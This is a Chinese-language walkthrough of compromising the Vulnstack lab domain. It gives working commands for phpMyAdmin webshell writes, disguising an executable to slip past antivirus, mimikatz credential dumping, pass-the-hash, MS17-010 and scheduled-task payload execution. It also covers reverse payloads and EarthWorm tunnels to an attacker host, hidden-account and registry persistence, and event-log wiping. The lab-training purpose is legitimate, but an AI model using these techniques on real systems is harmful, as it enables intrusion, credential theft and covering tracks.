1. 环境准备与靶场搭建第一次接触Vulnstack靶场时我完全被内网渗透的复杂性震撼到了。这个靶场模拟了真实企业内网环境包含域控制器、Web服务器和普通办公主机等多种设备。搭建过程就像拼装一台精密仪器每个部件都要准确定位。靶机环境需要三台虚拟机域控制器Windows Server 2008Web服务器Windows 7办公主机Windows 7我使用的是VMware Workstation 16创建虚拟机时要注意几个关键配置网络模式必须选择仅主机模式确保与物理机隔离每台虚拟机内存建议分配2GB以上需要关闭所有虚拟机的防火墙新手最容易忽略这点# 关闭防火墙命令在每台Windows靶机上执行 netsh advfirewall set allprofiles state off搭建过程中最头疼的是域环境配置。我花了整整三小时才搞明白Active Directory的安装流程。关键步骤是先在域控制器上安装AD域服务然后创建域用户和组。记得要把另外两台Win7主机通过系统属性-计算机名-更改加入这个域。2. 外网渗透突破口实战从Web服务器开始突破。靶场的Web服务用的是PHPStudy搭建的存在两个致命漏洞phpMyAdmin弱口令和文件上传漏洞。这里分享我的踩坑经历第一次用弱口令admin/123456登录phpMyAdmin失败后我差点放弃。后来发现靶场设计者用的是root/root这个组合。登录成功后我尝试用SQL语句写入一句话木马SELECT ?php eval($_POST[cmd]);? INTO OUTFILE C:/phpstudy/www/shell.php但总提示写入失败。原来MySQL账户没有写权限这是新手常遇到的权限问题。最终我改用日志写入的方式成功getshellset global general_logon; set global general_log_fileC:/phpstudy/www/shell.php; select ?php eval($_POST[cmd]);?;拿到Webshell后我用蚁剑连接上传了MSF生成的木马。这里有个技巧Windows Defender会拦截普通exe文件但对伪装成图片的exe比如shell.jpg.exe检测较弱。上传后通过webshell执行成功获得meterpreter会话。3. 内网信息收集拿到第一个shell只是开始真正的挑战在内网。我首先用这些命令收集域信息net user /domain # 查看域用户 net group domain admins /domain # 查看域管理员 net group domain computers /domain # 查看域内主机发现内网网段是192.168.52.0/24域控IP是192.168.52.138。这里教大家一个快速扫描技巧for /L %i in (1,1,254) do ping -n 1 -w 50 192.168.52.%i | find TTL通过ARP缓存发现另外两台主机192.168.52.141Win7和192.168.52.138域控。接下来要做的是在meterpreter中添加路由run autoroute -s 192.168.52.0/24这个命令让MSF能访问内网其他主机。但很多新手会忽略一个关键点这只是MSF能通信其他工具如nmap还是无法直接扫描内网。这时就需要搭建代理隧道。4. 横向移动与域控突破横向移动我尝试了三种方法最终通过MS17-010漏洞成功方法一PsExec直接登录psexec.exe \\192.168.52.141 -u administrator -p Password123!但失败了因为靶场设置了强密码。方法二Hash传递攻击先用mimikatz抓取hashload kiwi kiwi_cmd privilege::debug kiwi_cmd sekurlsa::logonpasswords然后尝试传递攻击use exploit/windows/smb/psexec set SMBUser administrator set SMBPass 00000000000000000000000000000000:XXXXXX还是失败因为靶机打了补丁。方法三永恒之蓝漏洞最终用这个模块成功use exploit/windows/smb/ms17_010_psexec set payload windows/meterpreter/bind_tcp set RHOSTS 192.168.52.141 exploit拿下第二台主机后通过它作为跳板攻击域控。这里用到一个实用技巧通过共享文件夹上传木马net use \\192.168.52.138\c$ 密码 /user:administrator copy shell.exe \\192.168.52.138\c$\windows\temp\然后创建计划任务执行schtasks /create /tn update /tr C:\windows\temp\shell.exe /sc once /st 18:00 /S 192.168.52.138 /RU System /u administrator /p 密码5. 工具链协同作战单独使用MSF效率较低我后来改用CSMSF组合在CS创建监听器Payload选择Windows Beacon HTTP设置外网IP和端口在MSF生成兼容CS的payloaduse exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set LHOST CS服务器IP set LPORT 8888 set DisablePayloadHandler true set SESSION 1 exploitCS上线后用SMB Beacon横向移动右键点击已控主机 → 展开 → SMB Beacon自动通过命名管道建立通信这种组合最大的优势是可视化操作所有主机关系一目了然。通过CS的凭证导出功能我一次性获取了所有用户的hash省去了逐个抓取的麻烦。6. 踩坑经验与技巧总结整个过程中我总结了这些实用技巧隧道搭建技巧使用EarthWorm比frp更稳定多层网络时要用ssocksdrcsocks组合# 攻击机执行 ./ew -s rcsocks -l 1080 -e 8888 # 目标机执行 ./ew -s rssocks -d 攻击机IP -e 8888权限维持方法创建隐藏用户net user sysbackup$ Password123! /add注册表注入reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d C:\shell.exe日志清理要点清除事件日志wevtutil cl security删除最近文件记录del /f /q %UserProfile%\Recent\*最深刻的体会是内网渗透就像下围棋不能只盯着局部要时刻保持对整个网络拓扑的清晰认知。每次拿到新主机第一件事就是画网络拓扑图标注已控主机和潜在目标。